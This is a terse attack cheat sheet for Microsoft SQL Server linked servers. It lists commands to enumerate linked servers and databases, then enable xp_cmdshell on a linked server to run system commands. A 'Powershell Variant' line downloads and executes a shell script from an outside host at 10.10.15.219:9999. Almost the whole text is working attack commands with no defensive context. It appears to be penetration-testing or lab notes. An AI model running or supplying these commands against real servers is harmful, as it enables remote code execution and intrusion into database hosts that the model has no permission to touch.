Enumeration

1. Enumerate links

EXEC sp_linkedservers;

2. Enumerate DBs

SELECT * FROM OPENQUERY(TARGET, 'SELECT name, database_id, create_date FROM sys.databases');

3. Exploit

EXECUTE ('EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami";') AT LINK;

Powershell Variant:

EXECUTE ('EXEC xp_cmdshell "powershell -c IEX (New-Object Net.WebClient).DownloadString(''http://10.10.15.219:9999/shell.ps1'')";') AT LINK;